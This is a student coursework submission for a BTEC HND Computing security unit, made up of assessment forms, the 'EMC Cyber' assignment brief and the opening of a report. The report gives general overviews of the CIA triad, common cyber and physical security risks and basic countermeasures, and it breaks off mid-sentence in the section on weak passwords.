SECURITY

10/12/2022
Unit 05
Higher Nationals
Internal verification of assessment decisions – BTEC (RQF)
INTERNAL VERIFICATION – ASSESSMENT DECISIONS
Programme title BTEC Higher National Diploma in Computing

Assessor Internal
Verifier
Unit 05: Security
Unit(s)
EMC Cyber
Assignment title

Student’s name
List which assessment Pass Merit Distinction
criteria the Assessor
has awarded.
INTERNAL VERIFIER CHECKLIST

Do the assessment criteria awarded

match those shown in the assignment
brief? Y/N

Is the Pass/Merit/Distinction grade

awarded justified by the assessor’s
Y/N
comments on the student work?
Has the work been assessed
accurately? Y/N
Is the feedback to the student:
Give details:

• Constructive?
Y/N
• Linked to relevant assessment
criteria? Y/N

• Identifying opportunities for

improved performance?
Y/N
• Agreeing actions? Y/N

Does the assessment decision need

amending? Y/N

Assessor signature Date

Internal Verifier signature Date

Programme Leader signature (if
required) Date
 Confirm action completed
Remedial action taken

Give details:

Assessor signature Date

Internal Verifier
signature Date

Programme Leader signature

(if required) Date
Higher Nationals - Summative Assignment Feedback Form
Student Name/ID

Unit Title Unit 05: Security

Assignment Number 1 Assessor

2022/10/12 Date Received

Submission Date 1st submission
Date Received 2nd
Re-submission Date submission
Assessor Feedback:
LO1. Assess risks to IT security

Pass, Merit & P1 P2 M1 D1

Distinction Descripts

LO2. Describe IT security solutions.

Pass, Merit & P3 P4 M2 D1

Distinction Descripts

LO3. Review mechanisms to control organisational IT security.

Pass, Merit & P5 P6 M3 M4 D2

Distinction Descripts

LO4. Manage organisational security.

Pass, Merit & P7 P8 M5 D3

Distinction Descripts

Grade: Assessor Signature: Date:

Resubmission Feedback:

Grade: Assessor Signature: Date:

Internal Verifier’s Comments:

Signature & Date:

* Please note that grade decisions are provisional. They are only confirmed once internal and external moderation has taken place and grades decisions have
been agreed at the assessment board
Pearson
Higher Nationals in
Computing
Unit 5 : Security
General Guidelines

1. A Cover page or title page – You should always attach a title page to your assignment. Use previous page as
your cover sheet and make sure all the details are accurately filled.
2. Attach this brief as the first section of your assignment.
3. All the assignments should be prepared using a word processing software.
4. All the assignments should be printed on A4 sized papers. Use single side printing.
5. Allow 1” for top, bottom , right margins and 1.25” for the left margin of each page.

Word Processing Rules

1. The font size should be 12 point, and should be in the style of Time New Roman.
2. Use 1.5 line spacing. Left justify all paragraphs.
3. Ensure that all the headings are consistent in terms of the font size and font style.
4. Use footer function in the word processor to insert Your Name, Subject, Assignment No, and Page Number
on each page. This is useful if individual sheets become detached for any reason.
5. Use word processing application spell check and grammar check function to help editing your assignment.

Important Points:

1. It is strictly prohibited to use textboxes to add texts in the assignments, except for the compulsory
information. eg: Figures, tables of comparison etc. Adding text boxes in the body except for the before
mentioned compulsory information will result in rejection of your work.
2. Carefully check the hand in date and the instructions given in the assignment. Late submissions will not be
accepted.
3. Ensure that you give yourself enough time to complete the assignment by the due date.
4. Excuses of any nature will not be accepted for failure to hand in the work on time.
5. You must take responsibility for managing your own time effectively.
6. If you are unable to hand in your assignment on time and have valid reasons such as illness, you may apply
(in writing) for an extension.
7. Failure to achieve at least PASS criteria will result in a REFERRAL grade .
8. Non-submission of work without valid reasons will lead to an automatic RE FERRAL. You will then be asked
to complete an alternative assignment.
9. If you use other people’s work or ideas in your assignment, reference them properly using HARVARD
referencing system to avoid plagiarism. You have to provide both in-text citation and a reference list.
10. If you are proven to be guilty of plagiarism or any academic misconduct, your grade could be reduced to A
REFERRAL or at worst you could be expelled from the course
Student Declaration

I hereby, declare that I know what plagiarism entails, namely to use another’s work and to present it as my
own without attributing the sources in the correct way. I further understand what it means to copy another’s
work.

1. I know that plagiarism is a punishable offence because it constitutes theft.

2. I understand the plagiarism and copying policy of the Edexcel UK.
3. I know what the consequences will be if I plagiarize or copy another’s work in any of the
assignments for this programme. .
4. I declare therefore that all work presented by me for every aspects of my programme, will be of my
own, and where I have made use of another’s work, I will attribute the source in the correct way.
5. I acknowledge that the attachment of this document, signed or not, constitutes a binding agreement
between myself and Pearson UK.
6. I understand that my assignment will not be considered as submitted if this document is not attached
to the main submission.

2022/10/12
Student’s Signature: Date:
(Provide E-mail ID) (Provide Submission Date)
Assignment Brief
Student Name /ID Number
Unit Number and Title Unit 5- Security
Academic Year 2020/2021
Unit Tutor
Assignment Title EMC Cyber

Issue Date
Submission Date 2022/10/12
IV Name & Date
Submission Format:
The submission should be in the form of an individual written report written in a concise, formal
business style using single spacing and font size 12. You are required to make use of headings,
paragraphs and subsections as appropriate, and all work must be supported with research and
referenced using Harvard referencing system. Please provide in- text citation and an end list of
references using Harvard referencing system.

Section 4.2 of the assignment required to do a 15 minutes presentation to illustrate the answers.

Unit Learning Outcomes:

LO1 Assess risks to IT security.
LO2 Describe IT security solutions.
LO3 Review mechanisms to control organisational IT security.
LO4 Manage organisational security.
Assignment Brief and Guidance:
Scenario

‘EMC Cyber’ is a reputed cyber security company based in Colombo Sri Lanka that is delivering
security products and services across the entire information technology infrastructure. The company
has a number of clients both in Sri Lanka and abroad, which includes some of the top-level companies
of the world serving in multitude of industries. The company develops cyber security software
including firewalls, anti-virus, intrusion detection and protection, and endpoint security. EMC Cyber is
tasked with protecting companies’ networks, clouds, web applications and emails. They also offer
advanced threat protection, secure unified access, and endpoint security. Further they also play the role
of consulting clients on security threats and how to solve them. Additionally the company follows
different risk management standards depending on the company, with the ISO 31000 being the most
prominent.

One of the clients of EMC Cyber, Lockhead Aerospace manufacturing which is a reputed aircraft
manufacturer based in the US, has tasked the company to investigate the security implications of
developing IOT based automation applications in their manufacturing process. The client has requested
EMC to further audit security risks of implementing web based IOT applications in their
manufacturing process and to propose solutions. Further, Lockhead uses ISO standards and has
instructed EMC to use the ISO risk management standards when proposing the solution.

The director of the company understands such a system would be the target for cyber-attacks. As you
are following a BTEC course which includes a unit in security, the director has asked you to
investigate and report on potential cyber security threats to their web site, applications and
infrastructure. After the investigation you need to plan a solution and how to implement it according
standard software engineering principles.
Activity 01

Assuming the role of External Security Analyst, you need to compile a report focusing on following
elements to the board of EMC Cyber’;

1.1 Identify the CIA Triad concept and evaluate why and how the CIA Triad could be utilize to EMC
Cyber to improve the organization’s security.

1.2 Identify types of security risks EMC Cyber is subject to its present setup and the impact that they
would make on the business itself. Evaluate at least three physical and virtual security risks identified
and suggest the security measures that can be implemented in order to improve the organization’s
security.

1.3 Develop and describe security procedures for EMC Cyber to minimize the impact of issues
discussed in section (1.1) by assessing and rectifying the risks.

Activity 02

2.1 Identify how EMC Cyber and its clients will be impacted by improper/ incorrect configurations
that are applicable to firewalls and VPN solutions. IT security can include a network monitoring
system. Discuss how EMC cyber can benefit by implementing a network monitoring system with
supporting reasons.

2.2 Explain how the following technologies would benefit EMC Cyber and its Clients by facilitating a
‘trusted network’. (Support your answer with suitable examples).

i) DMZ

ii) Static IP

iii)NAT

2.3 Identify and evaluate the tools that can be utilized by EMC cyber to improve the network and
security performance without compromising each other. Evaluate at least three virtual and physical
security measures that can be implemented by EMC to uphold the integrity of organization’s IT policy.

Activity 03

3.1 Discuss suitable risk assessment integrated enterprise risk management procedures for EMC Cyber
solutions and the impact an IT security audit will have on safeguarding organization and its clients.
Furthermore, your discussion should include how IT security can be aligned with an organizational IT
policy and how misalignment of such a policy can impact on organization’s security.

(This can include one or more of the following: network change management, audit control, business
continuance/disaster recovery plans, potential loss of data/business, intellectual property, Data
Protection Act; Computer Misuse Act; ISO 31000 standards.)

3.2 Explain the mandatory data protection laws and procedures which will be applied to data storage
solutions provided by EMC Cyber. You should also summarize ISO 31000 risk management
methodology.

Activity 04

4.1 Design an organizational security policy for EMC Cyber to minimize exploitations and misuses
while evaluating the suitability of the tools used in an organizational policy.

4.2 Develop and present a disaster recovery plan for EMC Cyber according to the ISO/IEC
17799:2005 or similar standard which should include the main components of an organizational
disaster recovery plan with justifications. Discuss how critical the roles of the stakeholders in the
organization to successfully implement the security policy and the disaster recovery plan you
recommended as a part of the security audit.

(Students should produce a 15 minutes PowerPoint presentation which illustrates the answer for
this section including justifications and reason for decisions and options used).
Grading Rubric
Grading Criteria Achieved Feedback

LO1 Assess risks to IT security

P1 Identify types of security risks to organisations.

P2 Describe organizational security procedures.

M1 Propose a method to assess and treat IT

security risks.
LO2 Describe IT security solutions

P3 Identify the potential impact to IT security of

incorrect configuration of firewall policies and
thirparty VPNs.
P4 Show, using an example for each, how
implementing a DMZ, static IP and NAT in a
network can improve Network Security.
M2 Discuss three benefits to implement network
monitoring systems with supporting reasons.
D1 Evaluate a minimum of three of physical and
virtual security measures that can be employed to
ensure the integrity of organisational IT security.
LO3 Review mechanisms to control organisational
IT
security

P5 Discuss risk assessment procedures.

P6 Explain data protection processes and

regulations as applicable to an organisation.

M3 Summarise the ISO 31000 risk management

methodology and its application in IT security.
M4 Discuss possible impacts to organizational
security resulting from an IT security audit.
D2 Consider how IT security can be aligned with
organisational
policy, detailing the security impact of any
misalignment.
LO4 Manage organizational security
P7 Design and implement a security policy for an
organisation.
P8 List the main components of an organisational
disaster recovery plan, justifying the reasons for
inclusion.
M5 Discuss the roles of stakeholders in the
organisation to implement security audit
recommendations.
D3 Evaluate the suitability of the tools used in an
organisational policy.

1|Page
Table of Contents
Activity 01..................................................................................................................................5
CIA Triad...................................................................................................................................5
Why should we use CIA triad for EMC Cyber?....................................................................8
How CIA Triad could be utilized to EMC Cyber to improve the organization’s security?...9
Risk..........................................................................................................................................10
Security Risk........................................................................................................................11
EMC CYBER - Security Risks:...........................................................................................11
Physical and Virtual Security Risks.........................................................................................14
Physical Security Risks........................................................................................................14
Virtual Security Risk............................................................................................................16
Vulnerability........................................................................................................................18
Threat...................................................................................................................................20
Security procedures for EMC Cyber to minimize the impact of risks.....................................24
ACTIVITY 02..........................................................................................................................27
Firewall....................................................................................................................................27
Virtual Private Network (VPN)...............................................................................................31
Network Monitoring System....................................................................................................36
Benefits of Implementing a Network Management System to EMC Cyber........................37
Demilitarized Zone (DMZ)......................................................................................................39
Static IP....................................................................................................................................42
Network address translation (NAT).........................................................................................44
How does DMZ, Static IP, NAT help EMC cyber?.................................................................46
Tools to improve the Network of EMC cyber.........................................................................47
Tools to improve the Security of EMC cyber..........................................................................51
Virtual Security Measures implemented by EMC Cyber........................................................53
Physical Security Measures implemented by EMC Cyber......................................................55
Activity 03................................................................................................................................56
Risk Assessment.......................................................................................................................56
Risk assessment Process......................................................................................................57
Risk Assessment Framework...............................................................................................58
Risk Impact and Probability Chart.......................................................................................61
EMC Cyber Risk Impact and Risk Matrix...........................................................................62
EMC CYBER RISK IMPACTS..........................................................................................62

2|Page
 IT Security and Organizational Policy.................................................................................66
Security Audit..........................................................................................................................68
Data protection laws and procedures.......................................................................................71
Data protection Act of 1998.................................................................................................71
Computer Misuse Act of 1990.............................................................................................74
ISO 31000 Risk Management Methodology........................................................................74
Activity 04................................................................................................................................77
Security Policy.........................................................................................................................77
EMC Cyber Security Policy.................................................................................................79
ISO/IEC 17799:2005................................................................................................................99
References..............................................................................................................................100

Table Of Figures
Figure 1 CIA Triad.....................................................................................................................5
Figure 2 Vulnerability..............................................................................................................18
Figure 3 Threats.......................................................................................................................21
Figure 4 Firewall......................................................................................................................27
Figure 5 Firewall and VPN......................................................................................................35
Figure 6 SolarWinds Network Performance Monitor..............................................................48
Figure 7 AUVIK......................................................................................................................49
Figure 8 Datadog Network Performance Monitoring..............................................................50
Figure 9 PRTG Network Monitor............................................................................................51
Figure 10 Risk Probability Chart.............................................................................................61
Figure 11 ISO 31000 Risk Management..................................................................................76
Figure 12 DRP..........................................................................................................................86
Figure 13 DRP contents...........................................................................................................87
Figure 14 DRP company intro.................................................................................................87
Figure 15 Disaster....................................................................................................................88
Figure 16 Disaster recovery plan.............................................................................................88
Figure 17 DRP..........................................................................................................................89
Figure 18 EMC Cyber - DRP...................................................................................................89
Figure 19..................................................................................................................................90
Figure 20..................................................................................................................................90
Figure 21 RTO and RPO..........................................................................................................91
Figure 22..................................................................................................................................91
Figure 23..................................................................................................................................92
Figure 24..................................................................................................................................92
Figure 25 Stakeholders.............................................................................................................93
Figure 26 Types of stakeholders..............................................................................................93
Figure 27 Internal stakeholder.................................................................................................94
Figure 28 Employee.................................................................................................................94

3|Page
Figure 29 Owner......................................................................................................................95
Figure 30 Manager...................................................................................................................95
Figure 31 External stakeholders...............................................................................................96
Figure 32 Customer..................................................................................................................96
Figure 33 Suppliers..................................................................................................................97
Figure 34 Governments............................................................................................................97
Figure 35 Community..............................................................................................................98
Figure 36 The end....................................................................................................................98

4|Page
Activity 01
1.1 Identify the CIA Triad concept and evaluate why and how the CIA Triad could be
utilize to EMC Cyber to improve the organization’s security.

CIA Triad
Confidentiality, Integrity, and Availability are represented by the three letters "CIA triad"
A prominent model that serves as the foundation for the creation of security systems is the
CIA triad. They are used to identify weaknesses and develop strategies for problem-solving.

The CIA triangle divides these three concepts into different focus areas because they are
essential to the running of a business: secrecy, integrity, and availability of information. This
distinction is useful because it directs security teams in determining the many approaches
they might take to each issue.

When all three requirements have been completed, the organization's security profile should
be stronger and more prepared to cope with threat situations.

CIA Triad
o Confidentiality
o Integrity
o Availability

Figure 1 CIA Triad

5|Page
 Confidentiality
o The efforts made by an organisation to keep data private or hidden are referred
to as confidentiality. To do this, access to information must be restricted to
avoid the purposeful or unintentional sharing of data with unauthorised
parties. Making ensuring that individuals without the appropriate authority are
barred from accessing assets crucial to your firm is a crucial part of protecting
confidentiality. On the other hand, a good system also makes sure that
individuals who require access have the proper rights.
o Confidentiality can be breached in several ways. This can entail making direct
assaults on systems the attacker doesn't have permission to access.
Additionally, it can entail an attacker attempting to directly access a database
or programme in order to steal or modify data.
o These direct assaults could employ strategies like man-in-the-middle (MITM)
attacks, in which the attacker inserts themself into the information stream to
intercept data and either take it or modify it. Other kinds of network
eavesdropping are used by certain attackers to obtain passwords. To get the
next level of clearance, the attacker may occasionally try to get further system
rights.
o However, not all breaches of privacy are deliberate. It's also possible that
human mistake or inadequate security measures are at fault. A password to a
workstation or to log in to a restricted area, for instance, could not be
protected. Users have the option of sharing their login information with
another person or letting someone watch them log in. In some cases, a user's
improper encryption of a connection might allow an attacker to intercept the
user's data. Additionally, a thief may take hardware, such as a whole computer
or a gadget utilised during the login process and use it to access private data.
o You can categorise and label restricted material, set access control policies,
encrypt data, and employ multi-factor authentication (MFA) systems to
combat confidentiality breaches. It is also important to make sure that
everyone in the company has the education and information necessary to
identify threats and steer clear of them.

6|Page
 Integrity
o Integrity requires ensuring that your data is reliable and unaltered. Only if the
data is dependable, accurate, and legitimate will the integrity of your data be
preserved.
o Integrity is frequently compromised knowingly. An attacker may get around
an intrusion detection system (IDS), modify file settings to provide
unauthorised access, or manipulate the system's logs to conceal the assault.
Integrity can also be compromised accidentally. It's possible for someone to
carelessly input the incorrect code or make another error. Additionally,
integrity might be compromised if the business's security rules, safeguards,
and processes are insufficient without any one individual in the organisation
being held accountable for the blame.
o You can employ hashing, encryption, digital certificates, or digital signatures
to safeguard the integrity of your data. You may use reputable certificate
authority (CAs) to authenticate your website so that users know they are
accessing the website they planned to see.
o Non-repudiation, which refers to when something cannot be disputed or
repudiated, is a technique for confirming integrity. Employees at your
organisation, for instance, cannot deny that an email was sent by them if it has
their digital signature. The receiver is also unable to dispute that they received
the email from the sender.

 Availability
o Even if data is kept private and its integrity is upheld, unless it is accessible to
individuals within the business and the clients they serve, it is frequently
meaningless. This requires that all systems, networks, and applications operate
properly and at the appropriate times. Additionally, those who have access to
certain information must be able to use it when they need to and accessing the
data shouldn't take too long.
o The availability will be impacted, for instance, if a power loss occurs without
a disaster recovery strategy in place to assist users in regaining access to

7|Page
 crucial systems. Additionally, users may be unable to reach the workplace due
to a natural disaster like a flood or even a strong snowfall, which might affect
the accessibility of their workstations and other devices that deliver mission-
critical data or apps. Additionally, purposeful sabotage techniques like
ransomware or denial-of-service (DoS) assaults might jeopardise availability.
o Organizations can utilise redundant networks, servers, and applications to
guarantee availability. These can be set up to become accessible if the main
system is down or damaged. Maintaining software and security system
updates will help you increase availability. By doing this, you reduce the
possibility that a programme may malfunction or that a recently discovered
malware would penetrate your system. Backups and comprehensive disaster
recovery strategies can also assist a business in quickly regaining availability
following a bad incident.

What Is the Importance of the CIA Triad?

The primary framework for creating security systems and guidelines for organisations is the
CIA triad. As a result, the CIA trinity is essential to protecting your data from evolving
cyberthreats. An organization is said to have failed in properly adopting one or more of these
principles if a security incident—such as data theft or a security breach—occurs. The CIA
trinity is essential to information security because it improves security posture, assists
enterprises in maintaining compliance with complicated requirements, and guarantees
business continuity.

Why should we use CIA triad for EMC Cyber?

 The CIA trio offers a straightforward yet thorough high-level checklist for assessing
your security protocols and equipment. All three requirements—confidentiality,
integrity, and availability—are met by an efficient system. A system of information
security that falls short in one of the three CIA triangle components is inadequate

 The CIA security triangle is useful in determining what failed and what succeeded
following a negative event. For instance, it's possible that availability was impacted
during a virus assault like ransomware, but the mechanisms in place were still able to
protect the confidentiality of crucial data. This information may be utilised to
strengthen weak areas and repeat effective strategies.

8|Page
  The CIA trio should be used in most security scenarios since each element is
essential. However, it is especially beneficial for creating systems for data
categorization and controlling access rights in EMC cyber. When dealing with our
organization’s (EMC Cyber) cyber vulnerabilities, we should strictly use the CIA
trinity. It can be an effective tool for stopping the Cyber Kill Chain, which is the
procedure for identifying and carrying out a cyberattack. The CIA security trio can
assist us in identifying potential targets for attackers so that we can put rules and
mechanisms in place to appropriately secure those assets.
 In addition, the CIA triad can be used when training employees regarding
cybersecurity. we can use hypothetical scenarios or real-life case studies to help
employees think in terms of the maintenance of confidentiality, integrity, and
availability of information and systems

How CIA Triad could be utilized to EMC Cyber to improve the organization’s
security?
Confidentiality 

 Organize the assets and data being managed according to the privacy rules.
 Make two-factor authentication and data encryption essential components of better
security procedures.
 Make sure that file permissions, and access control lists are frequently reviewed and
updated.
 Employees should get privacy considerations training that is both generic and role
specific.
 Encrypt data at rest and in transit
 Use Access Control Lists to ensure that only the correct users or services are granted
access to a given resource.

Integrity

 Examine each method used for data processing, transport, and storage.

9|Page
  To ensure integrity, it may be helpful to utilise version control, data logs, granular
access control, and checksums. Data corruption may be further avoided by hash
functions.
 Recognize the legal and regulatory obligations for your company. To give one
example, the GDPR only enables data transfers to third parties or suppliers outside the
EU if "sufficient levels of protection" and "legal measures" are in place.
 Consider making an investment in a reliable backup and recovery solution that
guarantees company continuity and prompt data recovery in the case of a security or
data breach.

Availability

 Include preventative measures in the system architecture, such as redundancy,

failover, and redundant array of independent discs (RAID). Regularize security audits.
Update your system, network, and applications automatically or regularly.
 Use detection technologies like anti-virus programmes and network/server monitoring
software.
 Recognize that downtime can occur even on highly protected SaaS systems and
applications. All data may be precisely restored in a matter of minutes thanks to a
dependable cloud-based data backup system.
 Create a data recovery and business continuity strategy with specific remedial actions,
such as prompt customer communication, for the case of data loss.

1.2 Identify types of security risks EMC Cyber is subject to its present setup and the
impact that they would make on the business itself. Evaluate at least three physical and
virtual security risks identified and suggest the security measures that can be
implemented in order to improve the organization’s security.

Risk
What is a Risk?
Risk may be defined as the chance that anything negative will occur. Risk is uncertainty
about how an action will affect something that people value (such as their health, well-being,
wealth, property, or the environment), frequently focused on unfavourable outcomes. There

10 | P a g e
have been many distinct meanings put forward. Effect of uncertainty on objectives is the
international standard definition of risk for use in various applications.

Security Risk
Anything on your computer that may harm it, steal your data, or give someone else access to
it without your knowledge or agreement constitutes a computer security risk. Computer risks
can be caused by a wide variety of factors, including malware, a catch-all word for several
subtypes of harmful software. Although computer viruses are the first thing that come to
mind, there are other sorts of malicious software, such as Trojan horses, worms, ransomware,
spyware, and viruses, that can pose a threat to computer security. Risks can also come from
improper setup of computer hardware and risky computing practises.

EMC CYBER - Security Risks:

Malware attack

Attackers utilise a variety of techniques, most frequently social engineering, to install

malware on a user's device. Users could be prompted to do an action, such opening an
attachment or clicking a link. In other instances, malware instals itself without the user's
knowledge or agreement by taking advantage of flaws in operating systems or browsers.

Once malware has been installed, it can monitor user activity, relay sensitive information to
the attacker, help the attacker breach other network targets, and even make the user's device a
member of a botnet that the attacker uses for malevolent purposes.

1) Trojan virus: deceives the user into believing it to be a safe file. A Trojan can
infiltrate a system and create a backdoor that can be used by attackers.
2) Ransomware: Unless a ransom is paid, ransomware blocks access to the victim's data
and threatens to erase or publish it.
3) Worms are a type of malware that are made to use backdoors and vulnerabilities to
infiltrate operating systems without authorization. The worm may launch several
assaults after installation, including distributed denial of service (DDoS).

11 | P a g e
 4) Spyware is a type of spyware that allows criminal actors to access sensitive data,
such as credit card and login information, without authorization. Mobile devices,
desktop programmes, and desktop browsers can all be impacted by spyware.

Social engineering attacks

Social engineering attacks work by psychologically manipulating users into performing

actions desirable to an attacker or divulging sensitive information.

1) Phishing is when criminals transmit phoney email contact that appears to be from
reliable sources. The email may exhort the recipient to take an essential step, click on
a link to a malicious website, or download malicious software, prompting them to
provide critical information to the attacker. Malware-infected email attachments can
be found in phishing emails.
2) Spear phishing is a kind of phishing in which hackers target those with authority
over security, including system administrators or senior executives.
3) Malvertising is internet advertising that is controlled by hackers and that, when a
person clicks on it or even just views it, infects their machine with dangerous
malware. Many reputable web publications have been found to include malicious
advertising.

Software supply chain attacks

A cyberattack on a company that targets the gaps in its reliable software update and supply
chain is known as a software supply chain assault. The network of all people, businesses,
resources, tasks, activities, and technological advancements involved in the production and
distribution of a good is known as a supply chain. A software supply chain assault takes
advantage of the faith that businesses have in their outside providers, particularly about
updates and patching.

1) software development tools or dev/test infrastructure compromise

2) theft or hacking of equipment or accounts belonging to privileged third-party
providers
3) malicious applications issued using forged developer IDs or code signing certificates
4) Viruses installed on firmware or hardware components
5) Pre-installed malware on gadgets including cameras, USBs, and cell phones

12 | P a g e
Distributed denial of service (DDoS)

A denial of service (DoS) attack aims to overtax the resources of a target system, render it
inoperable, and prevent people from accessing it. In a distributed denial of service (DDoS)
attack, many compromised computers or other devices are used in a coordinated assault on
the target system.

DDoS assaults are frequently combined with other online threats. These assaults may begin
with a denial of service to distract security personnel and cause confusion while carrying out
more covert actions to steal data or do other harm.

1) Botnets are malware-infected computer systems that are under the control of hackers.
These bots are used by attackers to conduct DDoS assaults. Millions of devices can be
a part of large botnets, which can conduct massively destructive assaults.
2) Smurf attack: Internet Control Message Protocol (ICMP) echo requests are sent to
the victim's IP address during a smurf attack. The ‘spoofed' IP addresses used to
produce the ICMP queries. To overload a target system, attackers automate and
execute this procedure in mass quantities.

Man-in-the-middle attack (MitM)

Users and devices think they are in direct communication with the target system's server
when they access a distant system through the internet. Attackers violate this presumption in
a MitM attack by standing between the user and the target server.

1) Session hijacking: an attacker hijacks a session between a network server and a

client. The attacking computer substitutes its IP address for the IP address of the
client. The server believes it is corresponding with the client and continues the
session.
2) Replay attack: a cybercriminal eavesdrops on network communication and replays
messages later, pretending to be the user. Replay attacks have been largely mitigated
by adding timestamps to network communications.

Password attacks

A hacker can gain access to the password information of an individual by ‘sniffing’ the
connection to the network, using social engineering, guessing, or gaining access to a
password database. An attacker can ‘guess’ a password in a random or systematic way

13 | P a g e
 1) Brute-force password guessing: To guess the right password, an attacker will utilise
software to test many alternative ones. The programme can employ some logic to test
passwords based on a user's name, occupation, family, etc.
2) Dictionary attack: access to the victim's computer and network is gained using a
dictionary of popular passwords. One approach is to duplicate a password-containing
encrypted file, perform the same encryption on a dictionary of frequently used
passwords, and compare the results.

The natural disasters can be impacted the EMC cyber

1. Lightning: Nature's armoury includes some extremely lethal and devastating
weapons.
Undoubtedly one of the more deadly ones is lightning. Any electrical gadgets that
stand in for EMC's data centre are frequently destroyed by lightning, which frequently
affects the EMC cyber. The main problem for EMC Cyber and its clients will be this.
2. Fire: A fire can spread across EMC's data centre and inflict permanent damage to
storage areas if the information centre is not adequately outfitted.

Physical and Virtual Security Risks

Physical Security Risks
Risk to physical security is an instance of being exposed to risk. For instance, not having
enough security training for personnel, leaving computers or laptops unattended on
workstations, or having minimal control over entrance and exit activities. Never accept
danger in the domain of physical security.

 Tailgating

What is tailgating?

 When an unauthorised individual follows an authorised person into a secure location,

it is known as tailgating.
 When numerous persons enter through a door and just the first person has to show
identification or a swipe card, this will inevitably happen. People who are trailing

14 | P a g e
 behind will just continue, making it simple for any unauthorised individual to enter
without trouble.

How to reduce tailgating risks?

 Fortunately, by taking the proper physical security precautions, tailgating may be

controlled. Anti-tailing doors, if you're prepared to spend the money, practically
eliminate tailgating. Although they might be expensive to install, they are something
you might consider if you are moving to a new office site.

 Theft of documents

There are probably papers and documents scattered around your office, from desks to printing
stations. Sensitive paperwork might easily go missing and end up in the wrong hands.
Visitors can be able to see information that you wouldn't want them to see, even if they are
not removed from the office.

How to prevent document thefts?

Implementing a "clear-desk" policy is one of the greatest strategies to stop the theft or
unintentional disclosure of papers and sensitive information. Sensitive papers are less likely
to be left in risky areas when there is a clear-desk policy in place, which requires that all
desks are cleaned, and all paperwork is put away at the end of each workday. Additionally,
you must make sure that your staff members destroy all private data they own after using
them.

 Stolen Identification

Only if each person uses their own identity will an access control system function. It doesn't
matter how much access control you have if individuals are entering and exiting your
premises using someone else's identification.

How to prevent Stealing Id?

Employees must be made aware of the value of safeguarding their IDs or access cards.
Without sufficient training, staff members frequently lend or exchange their cards, making it

15 | P a g e
challenging to effectively manage access. Employees might not take proper care of their IDs
unless it is made clear how important it is to do so.

Virtual Security Risk

Malware, ransomware, and virus assaults may also affect virtual computers. Users lacking the
necessary security skills or malicious VM images are also potential sources of these assaults.
Without sufficient isolation and security safeguards, a compromised virtual machine (VM)
can propagate malware throughout the whole virtual infrastructure.

Viruses

A computer virus is a type of computer program that, when executed, replicates itself by
modifying other computer programs and inserting its own code. If this replication succeeds,
the affected areas are then said to be "infected" with a computer virus, a metaphor derived
from biological viruses.

How to prevent viruses?

 Install antivirus or anti-malware software. ...

 Keep your antivirus software up to date. ...
 Run antivirus scans regularly. ...
 Keep your operating system up to date. ...
 Protect your network. ...
 Think before you click. ...
 Keep your personal information secure. ...
 Don't use unsecured Wi-Fi.

Malware Attacks

Malware is any programme that is consciously created to disrupt a computer, server, client, or
computer network, leak confidential data, obtain unauthorised access to data or systems, deny
users access to information, or inadvertently compromise user privacy and security on a
computer.

Malware attacks are frequent cyberattacks in which the victim's system is compromised by
malware, which is often malicious software. Ransomware, malware, command and control,
and other specialised sorts of assaults are all included in malicious software, sometimes
known as viruses.

16 | P a g e
Malware deployment has been linked to criminal organisations, governmental actors, and
even well-known corporations; in some situations, it has even been shown to have occurred.
Some malware assaults, like other forms of cyberattacks, result in widespread press attention
because of their serious consequences.

How to prevent malware?

 Use Network and Endpoint Security Tools

 Use Encryption to Secure Data in Transit
 Educate Your Employees to Recognize Common Cyber Threats & Scam Tactics
 Update Your IT Systems, Plugins & Software Regularly
 Use Secure Authentication Methods
 Implement Identity Management & Access Controls

Ransomware

Malicious software (malware) known as ransomware threatens to publish or prevent access to

data or a computer system, typically by encrypting it, unless the victim pays the attacker a
ransom price. The ransom demand frequently includes a deadline. If the victim doesn't make
a timely payment, the data is permanently lost, or the ransom price rises.

How to prevent Ransomware?

 Backup Your Data

 Keep All Systems and Software Updated
 Install Antivirus Software & Firewalls
 Network Segmentation
 Email Protection
 Application Whitelisting
 Endpoint Security

Vulnerability
Vulnerabilities are weaknesses in a computer system that reduce its overall security.
Vulnerabilities might be flaws in the hardware itself or the software that uses it. A threat
actor, such as an attacker, can use vulnerabilities to breach privilege restrictions and carry out
illegal operations on a computer system. An attacker needs at least one tool or method that

17 | P a g e
can connect to a system flaw to exploit a vulnerability. In this context, the attack surface is
another name for vulnerabilities.

Figure 2 Vulnerability

Vulnerabilities

Misconfigurations

When security settings are not properly established during the setup process or are
maintained and delivered with default values, security misconfiguration happens. Any tier of
the application stack, cloud, or network might be affected by this. Misconfigured clouds are a
major contributor to data breaches, which end up costing businesses millions of dollars.

How to prevent Misconfigurations?

 Create a repeatable hardening procedure to make it quick and easy to deploy new
environments that are appropriately configured. The configuration of the production,
development, and QA environments must be same, but each environment must utilise
a different set of passwords. Automate this procedure to create a secure environment
quickly.
 In every scenario, install software patches and updates on a regular and timely basis.
Additionally, you may patch a golden picture and use it in your surroundings.
 Create an application architecture that provides efficient and secure element
separation.
 Run scans and audits often and on a regular basis to look for any security
vulnerabilities or missing fixes.

Unsecured APIs

18 | P a g e
Application programming interfaces that are not secured are another typical security
vulnerability (APIs). APIs offer a digital interface that permits communication between apps
or parts of applications via the internet or over a private network.

One of the rare corporate assets having a public IP address is an API. They can become an
easy target for attackers to infiltrate if not properly and sufficiently guarded.

How to prevent Unsecured APIs?

 Put security first. Security for APIs shouldn't be neglected or viewed as "someone
else's concern." Make security a priority and include it into your APIs as you design
them since organisations stand to lose a lot if they use unsafe APIs.
 Manage your API inventory. No matter how many publicly accessible APIs a
company has, it must first be aware of them to protect and manage them.
Unexpectedly, many are not. Work with DevOps teams to manage your APIs after
doing perimeter scans to find and catalogue them.
 TLS traffic encryption is used. While some organisations may decide not to encrypt
API payload data that is regarded as non-sensitive (for example, weather service
data), TLS encryption should be seen as necessary for organisations whose APIs
frequently exchange sensitive data (such as login credentials, credit card, social
security, banking information, and health information).

Access Control or Unauthorized Access

Companies often grant employees more access and permissions than needed to perform their
job functions. This increases identity-based threats and expands access to adversaries in the
event of a data breach.

 The principle of least privilege (POLP), a computer security idea and practise that
grants individuals restricted access permissions based on the activities essential to
their jobs, should be used by businesses to overcome this issue. Only authorised users
whose identities have been confirmed are given the required rights to carry out tasks
inside certain systems, apps, data, and other assets, thanks to POLP.
 Given that it enables enterprises to manage and keep an eye on network and data
access, POLP is commonly regarded as one of the best practises for enhancing the
organization's cybersecurity posture.

19 | P a g e
Weak or Stolen User Credentials

Many people make the mistake of using the same weak password for all of their accounts.
Password and user ID reuse or recycling opens up another possible exploitative channel for
thieves.

The most frequent usage of weak user credentials is in brute force assaults, in which a threat
